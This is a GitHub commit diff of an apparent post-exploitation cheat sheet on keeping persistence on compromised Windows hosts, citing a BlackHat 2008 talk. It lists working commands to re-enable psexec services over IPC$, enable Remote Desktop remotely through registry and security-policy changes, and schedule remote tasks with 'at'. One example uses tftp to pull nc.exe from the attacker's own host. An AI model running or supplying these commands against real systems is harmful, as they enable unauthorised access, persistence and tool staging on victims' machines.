Skip to content

Commit 570d034

Browse files
glennbarrettglennbarrett
committed
2 parents 520b250 + f33d876 commit 570d034

File tree

1 file changed

+10
-7
lines changed

1 file changed

+10
-7
lines changed

persistence/windows/general.md

Lines changed: 10 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -17,14 +17,15 @@ Commands to run to maintain persistence after you have exploited it and are usua
1717
### Enable `psexec`
1818
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
1919

20-
``c:\> net use \\[TargetIP]\ipc$ username /user:password
20+
<pre>
21+
c:\> net use \\[TargetIP]\ipc$ username /user:password
2122
c:\> sc \\[TargetIP] config netdde start= auto
2223
c:\> sc \\[TargetIP] config netddedsdm start= auto
2324
c:\> sc \\[TargetIP] config clipsrv start= auto
2425
c:\> sc \\[TargetIP] start netdde
2526
c:\> sc \\[TargetIP] start netddedsdm
2627
c:\> sc \\[TargetIP] start clipsrv
27-
``
28+
</pre>
2829

2930
### Enable Remote Desktop
3031
Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
@@ -57,20 +58,22 @@ Remote Desktop allows a remote user to receive a graphical "desktop" of the targ
5758

5859
1. On the remote system, execute the following commands:
5960

60-
``c:\> sc config termservice start= auto sc config termservice start= auto
61+
<pre>c:\> sc config termservice start= auto sc config termservice start= auto
6162
c:\> regedit /s enable_ts.reg
6263
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
6364
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
6465
c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
6566
c:\> gpupdate /Force
6667
c:\> net start "terminal services"
67-
``
68+
</pre>
69+
6870

6971
### Scheduler
70-
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
72+
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
7173

72-
``c:\> net use \\[TargetIP]\ipc$ password /user:username
74+
<pre>
75+
c:\> net use \\[TargetIP]\ipc$ password /user:username
7376
c:\> at \\[TargetIP] 12:00 pm command
74-
``
77+
</pre>
7578

7679
An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`

0 commit comments

Comments
 (0)